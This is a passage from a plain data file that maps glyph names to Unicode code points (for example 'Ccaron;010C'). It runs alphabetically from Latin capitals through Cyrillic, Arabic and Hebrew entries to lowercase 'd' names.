Bsmall;F762
Btopbar;0182
C;0043
Caarmenian;053E
Cacute;0106
Caron;F6CA
Caronsmall;F6F5
Ccaron;010C
Ccedilla;00C7
Ccedillaacute;1E08
Ccedillasmall;F7E7
Ccircle;24B8
Ccircumflex;0108
Cdot;010A
Cdotaccent;010A
Cedillasmall;F7B8
Chaarmenian;0549
Cheabkhasiancyrillic;04BC
Checyrillic;0427
Chedescenderabkhasiancyrillic;04BE
Chedescendercyrillic;04B6
Chedieresiscyrillic;04F4
Cheharmenian;0543
Chekhakassiancyrillic;04CB
Cheverticalstrokecyrillic;04B8
Chi;03A7
Chook;0187
Circumflexsmall;F6F6
Cmonospace;FF23
Coarmenian;0551
Csmall;F763
D;0044
DZ;01F1
DZcaron;01C4
Daarmenian;0534
Dafrican;0189
Dcaron;010E
Dcedilla;1E10
Dcircle;24B9
Dcircumflexbelow;1E12
Dcroat;0110
Ddotaccent;1E0A
Ddotbelow;1E0C
Decyrillic;0414
Deicoptic;03EE
Delta;2206
Deltagreek;0394
Dhook;018A
Dieresis;F6CB
DieresisAcute;F6CC
DieresisGrave;F6CD
Dieresissmall;F7A8
Digammagreek;03DC
Djecyrillic;0402
Dlinebelow;1E0E
Dmonospace;FF24
Dotaccentsmall;F6F7
Dslash;0110
Dsmall;F764
Dtopbar;018B
Dz;01F2
Dzcaron;01C5
Dzeabkhasiancyrillic;04E0
Dzecyrillic;0405
Dzhecyrillic;040F
E;0045
Eacute;00C9
Eacutesmall;F7E9
Ebreve;0114
Ecaron;011A
Ecedillabreve;1E1C
Echarmenian;0535
Ecircle;24BA
Ecircumflex;00CA
Ecircumflexacute;1EBE
Ecircumflexbelow;1E18
Ecircumflexdotbelow;1EC6
Ecircumflexgrave;1EC0
Ecircumflexhookabove;1EC2
Ecircumflexsmall;F7EA
Ecircumflextilde;1EC4
Ecyrillic;0404
Edblgrave;0204
Edieresis;00CB
Edieresissmall;F7EB
Edot;0116
Edotaccent;0116
Edotbelow;1EB8
Efcyrillic;0424
Egrave;00C8
Egravesmall;F7E8
Eharmenian;0537
Ehookabove;1EBA
Eightroman;2167
Einvertedbreve;0206
Eiotifiedcyrillic;0464
Elcyrillic;041B
Elevenroman;216A
Emacron;0112
Emacronacute;1E16
Emacrongrave;1E14
Emcyrillic;041C
Emonospace;FF25
Encyrillic;041D
Endescendercyrillic;04A2
Eng;014A
Enghecyrillic;04A4
Enhookcyrillic;04C7
Eogonek;0118
Eopen;0190
Epsilon;0395
Epsilontonos;0388
Ercyrillic;0420
Ereversed;018E
Ereversedcyrillic;042D
Escyrillic;0421
Esdescendercyrillic;04AA
Esh;01A9
Esmall;F765
Eta;0397
Etarmenian;0538
Etatonos;0389
Eth;00D0
Ethsmall;F7F0
Etilde;1EBC
Etildebelow;1E1A
Euro;20AC
Ezh;01B7
Ezhcaron;01EE
Ezhreversed;01B8
F;0046
Fcircle;24BB
Fdotaccent;1E1E
Feharmenian;0556
Feicoptic;03E4
Fhook;0191
Fitacyrillic;0472
Fiveroman;2164
Fmonospace;FF26
Fourroman;2163
Fsmall;F766
G;0047
GBsquare;3387
Gacute;01F4
Gamma;0393
Gammaafrican;0194
Gangiacoptic;03EA
Gbreve;011E
Gcaron;01E6
Gcedilla;0122
Gcircle;24BC
Gcircumflex;011C
Gcommaaccent;0122
Gdot;0120
Gdotaccent;0120
Gecyrillic;0413
Ghadarmenian;0542
Ghemiddlehookcyrillic;0494
Ghestrokecyrillic;0492
Gheupturncyrillic;0490
Ghook;0193
Gimarmenian;0533
Gjecyrillic;0403
Gmacron;1E20
Gmonospace;FF27
Grave;F6CE
Gravesmall;F760
Gsmall;F767
Gsmallhook;029B
Gstroke;01E4
H;0048
H18533;25CF
H18543;25AA
H18551;25AB
H22073;25A1
HPsquare;33CB
Haabkhasiancyrillic;04A8
Hadescendercyrillic;04B2
Hardsigncyrillic;042A
Hbar;0126
Hbrevebelow;1E2A
Hcedilla;1E28
Hcircle;24BD
Hcircumflex;0124
Hdieresis;1E26
Hdotaccent;1E22
Hdotbelow;1E24
Hmonospace;FF28
Hoarmenian;0540
Horicoptic;03E8
Hsmall;F768
Hungarumlaut;F6CF
Hungarumlautsmall;F6F8
Hzsquare;3390
I;0049
IAcyrillic;042F
IJ;0132
IUcyrillic;042E
Iacute;00CD
Iacutesmall;F7ED
Ibreve;012C
Icaron;01CF
Icircle;24BE
Icircumflex;00CE
Icircumflexsmall;F7EE
Icyrillic;0406
Idblgrave;0208
Idieresis;00CF
Idieresisacute;1E2E
Idieresiscyrillic;04E4
Idieresissmall;F7EF
Idot;0130
Idotaccent;0130
Idotbelow;1ECA
Iebrevecyrillic;04D6
Iecyrillic;0415
Ifraktur;2111
Igrave;00CC
Igravesmall;F7EC
Ihookabove;1EC8
Iicyrillic;0418
Iinvertedbreve;020A
Iishortcyrillic;0419
Imacron;012A
Imacroncyrillic;04E2
Imonospace;FF29
Iniarmenian;053B
Iocyrillic;0401
Iogonek;012E
Iota;0399
Iotaafrican;0196
Iotadieresis;03AA
Iotatonos;038A
Ismall;F769
Istroke;0197
Itilde;0128
Itildebelow;1E2C
Izhitsacyrillic;0474
Izhitsadblgravecyrillic;0476
J;004A
Jaarmenian;0541
Jcircle;24BF
Jcircumflex;0134
Jecyrillic;0408
Jheharmenian;054B
Jmonospace;FF2A
Jsmall;F76A
K;004B
KBsquare;3385
KKsquare;33CD
Kabashkircyrillic;04A0
Kacute;1E30
Kacyrillic;041A
Kadescendercyrillic;049A
Kahookcyrillic;04C3
Kappa;039A
Kastrokecyrillic;049E
Kaverticalstrokecyrillic;049C
Kcaron;01E8
Kcedilla;0136
Kcircle;24C0
Kcommaaccent;0136
Kdotbelow;1E32
Keharmenian;0554
Kenarmenian;053F
Khacyrillic;0425
Kheicoptic;03E6
Khook;0198
Kjecyrillic;040C
Klinebelow;1E34
Kmonospace;FF2B
Koppacyrillic;0480
Koppagreek;03DE
Ksicyrillic;046E
Ksmall;F76B
L;004C
LJ;01C7
LL;F6BF
Lacute;0139
Lambda;039B
Lcaron;013D
Lcedilla;013B
Lcircle;24C1
Lcircumflexbelow;1E3C
Lcommaaccent;013B
Ldot;013F
Ldotaccent;013F
Ldotbelow;1E36
Ldotbelowmacron;1E38
Liwnarmenian;053C
Lj;01C8
Ljecyrillic;0409
Llinebelow;1E3A
Lmonospace;FF2C
Lslash;0141
Lslashsmall;F6F9
Lsmall;F76C
M;004D
MBsquare;3386
Macron;F6D0
Macronsmall;F7AF
Macute;1E3E
Mcircle;24C2
Mdotaccent;1E40
Mdotbelow;1E42
Menarmenian;0544
Mmonospace;FF2D
Msmall;F76D
Mturned;019C
Mu;039C
N;004E
NJ;01CA
Nacute;0143
Ncaron;0147
Ncedilla;0145
Ncircle;24C3
Ncircumflexbelow;1E4A
Ncommaaccent;0145
Ndotaccent;1E44
Ndotbelow;1E46
Nhookleft;019D
Nineroman;2168
Nj;01CB
Njecyrillic;040A
Nlinebelow;1E48
Nmonospace;FF2E
Nowarmenian;0546
Nsmall;F76E
Ntilde;00D1
Ntildesmall;F7F1
Nu;039D
O;004F
OE;0152
OEsmall;F6FA
Oacute;00D3
Oacutesmall;F7F3
Obarredcyrillic;04E8
Obarreddieresiscyrillic;04EA
Obreve;014E
Ocaron;01D1
Ocenteredtilde;019F
Ocircle;24C4
Ocircumflex;00D4
Ocircumflexacute;1ED0
Ocircumflexdotbelow;1ED8
Ocircumflexgrave;1ED2
Ocircumflexhookabove;1ED4
Ocircumflexsmall;F7F4
Ocircumflextilde;1ED6
Ocyrillic;041E
Odblacute;0150
Odblgrave;020C
Odieresis;00D6
Odieresiscyrillic;04E6
Odieresissmall;F7F6
Odotbelow;1ECC
Ogoneksmall;F6FB
Ograve;00D2
Ogravesmall;F7F2
Oharmenian;0555
Ohm;2126
Ohookabove;1ECE
Ohorn;01A0
Ohornacute;1EDA
Ohorndotbelow;1EE2
Ohorngrave;1EDC
Ohornhookabove;1EDE
Ohorntilde;1EE0
Ohungarumlaut;0150
Oi;01A2
Oinvertedbreve;020E
Omacron;014C
Omacronacute;1E52
Omacrongrave;1E50
Omega;2126
Omegacyrillic;0460
Omegagreek;03A9
Omegaroundcyrillic;047A
Omegatitlocyrillic;047C
Omegatonos;038F
Omicron;039F
Omicrontonos;038C
Omonospace;FF2F
Oneroman;2160
Oogonek;01EA
Oogonekmacron;01EC
Oopen;0186
Oslash;00D8
Oslashacute;01FE
Oslashsmall;F7F8
Osmall;F76F
Ostrokeacute;01FE
Otcyrillic;047E
Otilde;00D5
Otildeacute;1E4C
Otildedieresis;1E4E
Otildesmall;F7F5
P;0050
Pacute;1E54
Pcircle;24C5
Pdotaccent;1E56
Pecyrillic;041F
Peharmenian;054A
Pemiddlehookcyrillic;04A6
Phi;03A6
Phook;01A4
Pi;03A0
Piwrarmenian;0553
Pmonospace;FF30
Psi;03A8
Psicyrillic;0470
Psmall;F770
Q;0051
Qcircle;24C6
Qmonospace;FF31
Qsmall;F771
R;0052
Raarmenian;054C
Racute;0154
Rcaron;0158
Rcedilla;0156
Rcircle;24C7
Rcommaaccent;0156
Rdblgrave;0210
Rdotaccent;1E58
Rdotbelow;1E5A
Rdotbelowmacron;1E5C
Reharmenian;0550
Rfraktur;211C
Rho;03A1
Ringsmall;F6FC
Rinvertedbreve;0212
Rlinebelow;1E5E
Rmonospace;FF32
Rsmall;F772
Rsmallinverted;0281
Rsmallinvertedsuperior;02B6
S;0053
SF010000;250C
SF020000;2514
SF030000;2510
SF040000;2518
SF050000;253C
SF060000;252C
SF070000;2534
SF080000;251C
SF090000;2524
SF100000;2500
SF110000;2502
SF190000;2561
SF200000;2562
SF210000;2556
SF220000;2555
SF230000;2563
SF240000;2551
SF250000;2557
SF260000;255D
SF270000;255C
SF280000;255B
SF360000;255E
SF370000;255F
SF380000;255A
SF390000;2554
SF400000;2569
SF410000;2566
SF420000;2560
SF430000;2550
SF440000;256C
SF450000;2567
SF460000;2568
SF470000;2564
SF480000;2565
SF490000;2559
SF500000;2558
SF510000;2552
SF520000;2553
SF530000;256B
SF540000;256A
Sacute;015A
Sacutedotaccent;1E64
Sampigreek;03E0
Scaron;0160
Scarondotaccent;1E66
Scaronsmall;F6FD
Scedilla;015E
Schwa;018F
Schwacyrillic;04D8
Schwadieresiscyrillic;04DA
Scircle;24C8
Scircumflex;015C
Scommaaccent;0218
Sdotaccent;1E60
Sdotbelow;1E62
Sdotbelowdotaccent;1E68
Seharmenian;054D
Sevenroman;2166
Shaarmenian;0547
Shacyrillic;0428
Shchacyrillic;0429
Sheicoptic;03E2
Shhacyrillic;04BA
Shimacoptic;03EC
Sigma;03A3
Sixroman;2165
Smonospace;FF33
Softsigncyrillic;042C
Ssmall;F773
Stigmagreek;03DA
T;0054
Tau;03A4
Tbar;0166
Tcaron;0164
Tcedilla;0162
Tcircle;24C9
Tcircumflexbelow;1E70
Tcommaaccent;0162
Tdotaccent;1E6A
Tdotbelow;1E6C
Tecyrillic;0422
Tedescendercyrillic;04AC
Tenroman;2169
Tetsecyrillic;04B4
Theta;0398
Thook;01AC
Thorn;00DE
Thornsmall;F7FE
Threeroman;2162
Tildesmall;F6FE
Tiwnarmenian;054F
Tlinebelow;1E6E
Tmonospace;FF34
Toarmenian;0539
Tonefive;01BC
Tonesix;0184
Tonetwo;01A7
Tretroflexhook;01AE
Tsecyrillic;0426
Tshecyrillic;040B
Tsmall;F774
Twelveroman;216B
Tworoman;2161
U;0055
Uacute;00DA
Uacutesmall;F7FA
Ubreve;016C
Ucaron;01D3
Ucircle;24CA
Ucircumflex;00DB
Ucircumflexbelow;1E76
Ucircumflexsmall;F7FB
Ucyrillic;0423
Udblacute;0170
Udblgrave;0214
Udieresis;00DC
Udieresisacute;01D7
Udieresisbelow;1E72
Udieresiscaron;01D9
Udieresiscyrillic;04F0
Udieresisgrave;01DB
Udieresismacron;01D5
Udieresissmall;F7FC
Udotbelow;1EE4
Ugrave;00D9
Ugravesmall;F7F9
Uhookabove;1EE6
Uhorn;01AF
Uhornacute;1EE8
Uhorndotbelow;1EF0
Uhorngrave;1EEA
Uhornhookabove;1EEC
Uhorntilde;1EEE
Uhungarumlaut;0170
Uhungarumlautcyrillic;04F2
Uinvertedbreve;0216
Ukcyrillic;0478
Umacron;016A
Umacroncyrillic;04EE
Umacrondieresis;1E7A
Umonospace;FF35
Uogonek;0172
Upsilon;03A5
Upsilon1;03D2
Upsilonacutehooksymbolgreek;03D3
Upsilonafrican;01B1
Upsilondieresis;03AB
Upsilondieresishooksymbolgreek;03D4
Upsilonhooksymbol;03D2
Upsilontonos;038E
Uring;016E
Ushortcyrillic;040E
Usmall;F775
Ustraightcyrillic;04AE
Ustraightstrokecyrillic;04B0
Utilde;0168
Utildeacute;1E78
Utildebelow;1E74
V;0056
Vcircle;24CB
Vdotbelow;1E7E
Vecyrillic;0412
Vewarmenian;054E
Vhook;01B2
Vmonospace;FF36
Voarmenian;0548
Vsmall;F776
Vtilde;1E7C
W;0057
Wacute;1E82
Wcircle;24CC
Wcircumflex;0174
Wdieresis;1E84
Wdotaccent;1E86
Wdotbelow;1E88
Wgrave;1E80
Wmonospace;FF37
Wsmall;F777
X;0058
Xcircle;24CD
Xdieresis;1E8C
Xdotaccent;1E8A
Xeharmenian;053D
Xi;039E
Xmonospace;FF38
Xsmall;F778
Y;0059
Yacute;00DD
Yacutesmall;F7FD
Yatcyrillic;0462
Ycircle;24CE
Ycircumflex;0176
Ydieresis;0178
Ydieresissmall;F7FF
Ydotaccent;1E8E
Ydotbelow;1EF4
Yericyrillic;042B
Yerudieresiscyrillic;04F8
Ygrave;1EF2
Yhook;01B3
Yhookabove;1EF6
Yiarmenian;0545
Yicyrillic;0407
Yiwnarmenian;0552
Ymonospace;FF39
Ysmall;F779
Ytilde;1EF8
Yusbigcyrillic;046A
Yusbigiotifiedcyrillic;046C
Yuslittlecyrillic;0466
Yuslittleiotifiedcyrillic;0468
Z;005A
Zaarmenian;0536
Zacute;0179
Zcaron;017D
Zcaronsmall;F6FF
Zcircle;24CF
Zcircumflex;1E90
Zdot;017B
Zdotaccent;017B
Zdotbelow;1E92
Zecyrillic;0417
Zedescendercyrillic;0498
Zedieresiscyrillic;04DE
Zeta;0396
Zhearmenian;053A
Zhebrevecyrillic;04C1
Zhecyrillic;0416
Zhedescendercyrillic;0496
Zhedieresiscyrillic;04DC
Zlinebelow;1E94
Zmonospace;FF3A
Zsmall;F77A
Zstroke;01B5
a;0061
aabengali;0986
aacute;00E1
aadeva;0906
aagujarati;0A86
aagurmukhi;0A06
aamatragurmukhi;0A3E
aarusquare;3303
aavowelsignbengali;09BE
aavowelsigndeva;093E
aavowelsigngujarati;0ABE
abbreviationmarkarmenian;055F
abbreviationsigndeva;0970
abengali;0985
abopomofo;311A
abreve;0103
abreveacute;1EAF
abrevecyrillic;04D1
abrevedotbelow;1EB7
abrevegrave;1EB1
abrevehookabove;1EB3
abrevetilde;1EB5
acaron;01CE
acircle;24D0
acircumflex;00E2
acircumflexacute;1EA5
acircumflexdotbelow;1EAD
acircumflexgrave;1EA7
acircumflexhookabove;1EA9
acircumflextilde;1EAB
acute;00B4
acutebelowcmb;0317
acutecmb;0301
acutecomb;0301
acutedeva;0954
acutelowmod;02CF
acutetonecmb;0341
acyrillic;0430
adblgrave;0201
addakgurmukhi;0A71
adeva;0905
adieresis;00E4
adieresiscyrillic;04D3
adieresismacron;01DF
adotbelow;1EA1
adotmacron;01E1
ae;00E6
aeacute;01FD
aekorean;3150
aemacron;01E3
afii00208;2015
afii08941;20A4
afii10017;0410
afii10018;0411
afii10019;0412
afii10020;0413
afii10021;0414
afii10022;0415
afii10023;0401
afii10024;0416
afii10025;0417
afii10026;0418
afii10027;0419
afii10028;041A
afii10029;041B
afii10030;041C
afii10031;041D
afii10032;041E
afii10033;041F
afii10034;0420
afii10035;0421
afii10036;0422
afii10037;0423
afii10038;0424
afii10039;0425
afii10040;0426
afii10041;0427
afii10042;0428
afii10043;0429
afii10044;042A
afii10045;042B
afii10046;042C
afii10047;042D
afii10048;042E
afii10049;042F
afii10050;0490
afii10051;0402
afii10052;0403
afii10053;0404
afii10054;0405
afii10055;0406
afii10056;0407
afii10057;0408
afii10058;0409
afii10059;040A
afii10060;040B
afii10061;040C
afii10062;040E
afii10063;F6C4
afii10064;F6C5
afii10065;0430
afii10066;0431
afii10067;0432
afii10068;0433
afii10069;0434
afii10070;0435
afii10071;0451
afii10072;0436
afii10073;0437
afii10074;0438
afii10075;0439
afii10076;043A
afii10077;043B
afii10078;043C
afii10079;043D
afii10080;043E
afii10081;043F
afii10082;0440
afii10083;0441
afii10084;0442
afii10085;0443
afii10086;0444
afii10087;0445
afii10088;0446
afii10089;0447
afii10090;0448
afii10091;0449
afii10092;044A
afii10093;044B
afii10094;044C
afii10095;044D
afii10096;044E
afii10097;044F
afii10098;0491
afii10099;0452
afii10100;0453
afii10101;0454
afii10102;0455
afii10103;0456
afii10104;0457
afii10105;0458
afii10106;0459
afii10107;045A
afii10108;045B
afii10109;045C
afii10110;045E
afii10145;040F
afii10146;0462
afii10147;0472
afii10148;0474
afii10192;F6C6
afii10193;045F
afii10194;0463
afii10195;0473
afii10196;0475
afii10831;F6C7
afii10832;F6C8
afii10846;04D9
afii299;200E
afii300;200F
afii301;200D
afii57381;066A
afii57388;060C
afii57392;0660
afii57393;0661
afii57394;0662
afii57395;0663
afii57396;0664
afii57397;0665
afii57398;0666
afii57399;0667
afii57400;0668
afii57401;0669
afii57403;061B
afii57407;061F
afii57409;0621
afii57410;0622
afii57411;0623
afii57412;0624
afii57413;0625
afii57414;0626
afii57415;0627
afii57416;0628
afii57417;0629
afii57418;062A
afii57419;062B
afii57420;062C
afii57421;062D
afii57422;062E
afii57423;062F
afii57424;0630
afii57425;0631
afii57426;0632
afii57427;0633
afii57428;0634
afii57429;0635
afii57430;0636
afii57431;0637
afii57432;0638
afii57433;0639
afii57434;063A
afii57440;0640
afii57441;0641
afii57442;0642
afii57443;0643
afii57444;0644
afii57445;0645
afii57446;0646
afii57448;0648
afii57449;0649
afii57450;064A
afii57451;064B
afii57452;064C
afii57453;064D
afii57454;064E
afii57455;064F
afii57456;0650
afii57457;0651
afii57458;0652
afii57470;0647
afii57505;06A4
afii57506;067E
afii57507;0686
afii57508;0698
afii57509;06AF
afii57511;0679
afii57512;0688
afii57513;0691
afii57514;06BA
afii57519;06D2
afii57534;06D5
afii57636;20AA
afii57645;05BE
afii57658;05C3
afii57664;05D0
afii57665;05D1
afii57666;05D2
afii57667;05D3
afii57668;05D4
afii57669;05D5
afii57670;05D6
afii57671;05D7
afii57672;05D8
afii57673;05D9
afii57674;05DA
afii57675;05DB
afii57676;05DC
afii57677;05DD
afii57678;05DE
afii57679;05DF
afii57680;05E0
afii57681;05E1
afii57682;05E2
afii57683;05E3
afii57684;05E4
afii57685;05E5
afii57686;05E6
afii57687;05E7
afii57688;05E8
afii57689;05E9
afii57690;05EA
afii57694;FB2A
afii57695;FB2B
afii57700;FB4B
afii57705;FB1F
afii57716;05F0
afii57717;05F1
afii57718;05F2
afii57723;FB35
afii57793;05B4
afii57794;05B5
afii57795;05B6
afii57796;05BB
afii57797;05B8
afii57798;05B7
afii57799;05B0
afii57800;05B2
afii57801;05B1
afii57802;05B3
afii57803;05C2
afii57804;05C1
afii57806;05B9
afii57807;05BC
afii57839;05BD
afii57841;05BF
afii57842;05C0
afii57929;02BC
afii61248;2105
afii61289;2113
afii61352;2116
afii61573;202C
afii61574;202D
afii61575;202E
afii61664;200C
afii63167;066D
afii64937;02BD
agrave;00E0
agujarati;0A85
agurmukhi;0A05
ahiragana;3042
ahookabove;1EA3
aibengali;0990
aibopomofo;311E
aideva;0910
aiecyrillic;04D5
aigujarati;0A90
aigurmukhi;0A10
aimatragurmukhi;0A48
ainarabic;0639
ainfinalarabic;FECA
aininitialarabic;FECB
ainmedialarabic;FECC
ainvertedbreve;0203
aivowelsignbengali;09C8
aivowelsigndeva;0948
aivowelsigngujarati;0AC8
akatakana;30A2
akatakanahalfwidth;FF71
akorean;314F
alef;05D0
alefarabic;0627
alefdageshhebrew;FB30
aleffinalarabic;FE8E
alefhamzaabovearabic;0623
alefhamzaabovefinalarabic;FE84
alefhamzabelowarabic;0625
alefhamzabelowfinalarabic;FE88
alefhebrew;05D0
aleflamedhebrew;FB4F
alefmaddaabovearabic;0622
alefmaddaabovefinalarabic;FE82
alefmaksuraarabic;0649
alefmaksurafinalarabic;FEF0
alefmaksurainitialarabic;FEF3
alefmaksuramedialarabic;FEF4
alefpatahhebrew;FB2E
alefqamatshebrew;FB2F
aleph;2135
allequal;224C
alpha;03B1
alphatonos;03AC
amacron;0101
amonospace;FF41
ampersand;0026
ampersandmonospace;FF06
ampersandsmall;F726
amsquare;33C2
anbopomofo;3122
angbopomofo;3124
angkhankhuthai;0E5A
angle;2220
anglebracketleft;3008
anglebracketleftvertical;FE3F
anglebracketright;3009
anglebracketrightvertical;FE40
angleleft;2329
angleright;232A
angstrom;212B
anoteleia;0387
anudattadeva;0952
anusvarabengali;0982
anusvaradeva;0902
anusvaragujarati;0A82
aogonek;0105
apaatosquare;3300
aparen;249C
apostrophearmenian;055A
apostrophemod;02BC
apple;F8FF
approaches;2250
approxequal;2248
approxequalorimage;2252
approximatelyequal;2245
araeaekorean;318E
araeakorean;318D
arc;2312
arighthalfring;1E9A
aring;00E5
aringacute;01FB
aringbelow;1E01
arrowboth;2194
arrowdashdown;21E3
arrowdashleft;21E0
arrowdashright;21E2
arrowdashup;21E1
arrowdblboth;21D4
arrowdbldown;21D3
arrowdblleft;21D0
arrowdblright;21D2
arrowdblup;21D1
arrowdown;2193
arrowdownleft;2199
arrowdownright;2198
arrowdownwhite;21E9
arrowheaddownmod;02C5
arrowheadleftmod;02C2
arrowheadrightmod;02C3
arrowheadupmod;02C4
arrowhorizex;F8E7
arrowleft;2190
arrowleftdbl;21D0
arrowleftdblstroke;21CD
arrowleftoverright;21C6
arrowleftwhite;21E6
arrowright;2192
arrowrightdblstroke;21CF
arrowrightheavy;279E
arrowrightoverleft;21C4
arrowrightwhite;21E8
arrowtableft;21E4
arrowtabright;21E5
arrowup;2191
arrowupdn;2195
arrowupdnbse;21A8
arrowupdownbase;21A8
arrowupleft;2196
arrowupleftofdown;21C5
arrowupright;2197
arrowupwhite;21E7
arrowvertex;F8E6
asciicircum;005E
asciicircummonospace;FF3E
asciitilde;007E
asciitildemonospace;FF5E
ascript;0251
ascriptturned;0252
asmallhiragana;3041
asmallkatakana;30A1
asmallkatakanahalfwidth;FF67
asterisk;002A
asteriskaltonearabic;066D
asteriskarabic;066D
asteriskmath;2217
asteriskmonospace;FF0A
asterisksmall;FE61
asterism;2042
asuperior;F6E9
asymptoticallyequal;2243
at;0040
atilde;00E3
atmonospace;FF20
atsmall;FE6B
aturned;0250
aubengali;0994
aubopomofo;3120
audeva;0914
augujarati;0A94
augurmukhi;0A14
aulengthmarkbengali;09D7
aumatragurmukhi;0A4C
auvowelsignbengali;09CC
auvowelsigndeva;094C
auvowelsigngujarati;0ACC
avagrahadeva;093D
aybarmenian;0561
ayin;05E2
ayinaltonehebrew;FB20
ayinhebrew;05E2
b;0062
babengali;09AC
backslash;005C
backslashmonospace;FF3C
badeva;092C
bagujarati;0AAC
bagurmukhi;0A2C
bahiragana;3070
bahtthai;0E3F
bakatakana;30D0
bar;007C
barmonospace;FF5C
bbopomofo;3105
bcircle;24D1
bdotaccent;1E03
bdotbelow;1E05
beamedsixteenthnotes;266C
because;2235
becyrillic;0431
beharabic;0628
behfinalarabic;FE90
behinitialarabic;FE91
behiragana;3079
behmedialarabic;FE92
behmeeminitialarabic;FC9F
behmeemisolatedarabic;FC08
behnoonfinalarabic;FC6D
bekatakana;30D9
benarmenian;0562
bet;05D1
beta;03B2
betasymbolgreek;03D0
betdagesh;FB31
betdageshhebrew;FB31
bethebrew;05D1
betrafehebrew;FB4C
bhabengali;09AD
bhadeva;092D
bhagujarati;0AAD
bhagurmukhi;0A2D
bhook;0253
bihiragana;3073
bikatakana;30D3
bilabialclick;0298
bindigurmukhi;0A02
birusquare;3331
blackcircle;25CF
blackdiamond;25C6
blackdownpointingtriangle;25BC
blackleftpointingpointer;25C4
blackleftpointingtriangle;25C0
blacklenticularbracketleft;3010
blacklenticularbracketleftvertical;FE3B
blacklenticularbracketright;3011
blacklenticularbracketrightvertical;FE3C
blacklowerlefttriangle;25E3
blacklowerrighttriangle;25E2
blackrectangle;25AC
blackrightpointingpointer;25BA
blackrightpointingtriangle;25B6
blacksmallsquare;25AA
blacksmilingface;263B
blacksquare;25A0
blackstar;2605
blackupperlefttriangle;25E4
blackupperrighttriangle;25E5
blackuppointingsmalltriangle;25B4
blackuppointingtriangle;25B2
blank;2423
blinebelow;1E07
block;2588
bmonospace;FF42
bobaimaithai;0E1A
bohiragana;307C
bokatakana;30DC
bparen;249D
bqsquare;33C3
braceex;F8F4
braceleft;007B
braceleftbt;F8F3
braceleftmid;F8F2
braceleftmonospace;FF5B
braceleftsmall;FE5B
bracelefttp;F8F1
braceleftvertical;FE37
braceright;007D
bracerightbt;F8FE
bracerightmid;F8FD
bracerightmonospace;FF5D
bracerightsmall;FE5C
bracerighttp;F8FC
bracerightvertical;FE38
bracketleft;005B
bracketleftbt;F8F0
bracketleftex;F8EF
bracketleftmonospace;FF3B
bracketlefttp;F8EE
bracketright;005D
bracketrightbt;F8FB
bracketrightex;F8FA
bracketrightmonospace;FF3D
bracketrighttp;F8F9
breve;02D8
brevebelowcmb;032E
brevecmb;0306
breveinvertedbelowcmb;032F
breveinvertedcmb;0311
breveinverteddoublecmb;0361
bridgebelowcmb;032A
bridgeinvertedbelowcmb;033A
brokenbar;00A6
bstroke;0180
bsuperior;F6EA
btopbar;0183
buhiragana;3076
bukatakana;30D6
bullet;2022
bulletinverse;25D8
bulletoperator;2219
bullseye;25CE
c;0063
caarmenian;056E
cabengali;099A
cacute;0107
cadeva;091A
cagujarati;0A9A
cagurmukhi;0A1A
calsquare;3388
candrabindubengali;0981
candrabinducmb;0310
candrabindudeva;0901
candrabindugujarati;0A81
capslock;21EA
careof;2105
caron;02C7
caronbelowcmb;032C
caroncmb;030C
carriagereturn;21B5
cbopomofo;3118
ccaron;010D
ccedilla;00E7
ccedillaacute;1E09
ccircle;24D2
ccircumflex;0109
ccurl;0255
cdot;010B
cdotaccent;010B
cdsquare;33C5
cedilla;00B8
cedillacmb;0327
cent;00A2
centigrade;2103
centinferior;F6DF
centmonospace;FFE0
centoldstyle;F7A2
centsuperior;F6E0
chaarmenian;0579
chabengali;099B
chadeva;091B
chagujarati;0A9B
chagurmukhi;0A1B
chbopomofo;3114
cheabkhasiancyrillic;04BD
checkmark;2713
checyrillic;0447
chedescenderabkhasiancyrillic;04BF
chedescendercyrillic;04B7
chedieresiscyrillic;04F5
cheharmenian;0573
chekhakassiancyrillic;04CC
cheverticalstrokecyrillic;04B9
chi;03C7
chieuchacirclekorean;3277
chieuchaparenkorean;3217
chieuchcirclekorean;3269
chieuchkorean;314A
chieuchparenkorean;3209
chochangthai;0E0A
chochanthai;0E08
chochingthai;0E09
chochoethai;0E0C
chook;0188
cieucacirclekorean;3276
cieucaparenkorean;3216
cieuccirclekorean;3268
cieuckorean;3148
cieucparenkorean;3208
cieucuparenkorean;321C
circle;25CB
circlemultiply;2297
circleot;2299
circleplus;2295
circlepostalmark;3036
circlewithlefthalfblack;25D0
circlewithrighthalfblack;25D1
circumflex;02C6
circumflexbelowcmb;032D
circumflexcmb;0302
clear;2327
clickalveolar;01C2
clickdental;01C0
clicklateral;01C1
clickretroflex;01C3
club;2663
clubsuitblack;2663
clubsuitwhite;2667
cmcubedsquare;33A4
cmonospace;FF43
cmsquaredsquare;33A0
coarmenian;0581
colon;003A
colonmonetary;20A1
colonmonospace;FF1A
colonsign;20A1
colonsmall;FE55
colontriangularhalfmod;02D1
colontriangularmod;02D0
comma;002C
commaabovecmb;0313
commaaboverightcmb;0315
commaaccent;F6C3
commaarabic;060C
commaarmenian;055D
commainferior;F6E1
commamonospace;FF0C
commareversedabovecmb;0314
commareversedmod;02BD
commasmall;FE50
commasuperior;F6E2
commaturnedabovecmb;0312
commaturnedmod;02BB
compass;263C
congruent;2245
contourintegral;222E
control;2303
controlACK;0006
controlBEL;0007
controlBS;0008
controlCAN;0018
controlCR;000D
controlDC1;0011
controlDC2;0012
controlDC3;0013
controlDC4;0014
controlDEL;007F
controlDLE;0010
controlEM;0019
controlENQ;0005
controlEOT;0004
controlESC;001B
controlETB;0017
controlETX;0003
controlFF;000C
controlFS;001C
controlGS;001D
controlHT;0009
controlLF;000A
controlNAK;0015
controlRS;001E
controlSI;000F
controlSO;000E
controlSOT;0002
controlSTX;0001
controlSUB;001A
controlSYN;0016
controlUS;001F
controlVT;000B
copyright;00A9
copyrightsans;F8E9
copyrightserif;F6D9
cornerbracketleft;300C
cornerbracketlefthalfwidth;FF62
cornerbracketleftvertical;FE41
cornerbracketright;300D
cornerbracketrighthalfwidth;FF63
cornerbracketrightvertical;FE42
corporationsquare;337F
cosquare;33C7
coverkgsquare;33C6
cparen;249E
cruzeiro;20A2
cstretched;0297
curlyand;22CF
curlyor;22CE
currency;00A4
cyrBreve;F6D1
cyrFlex;F6D2
cyrbreve;F6D4
cyrflex;F6D5
d;0064
daarmenian;0564
dabengali;09A6
dadarabic;0636
dadeva;0926
dadfinalarabic;FEBE
dadinitialarabic;FEBF
dadmedialarabic;FEC0
dagesh;05BC
dageshhebrew;05BC
dagger;2020
daggerdbl;2021
dagujarati;0AA6
dagurmukhi;0A26
dahiragana;3060
dakatakana;30C0
dalarabic;062F
dalet;05D3
daletdagesh;FB33
daletdageshhebrew;FB33
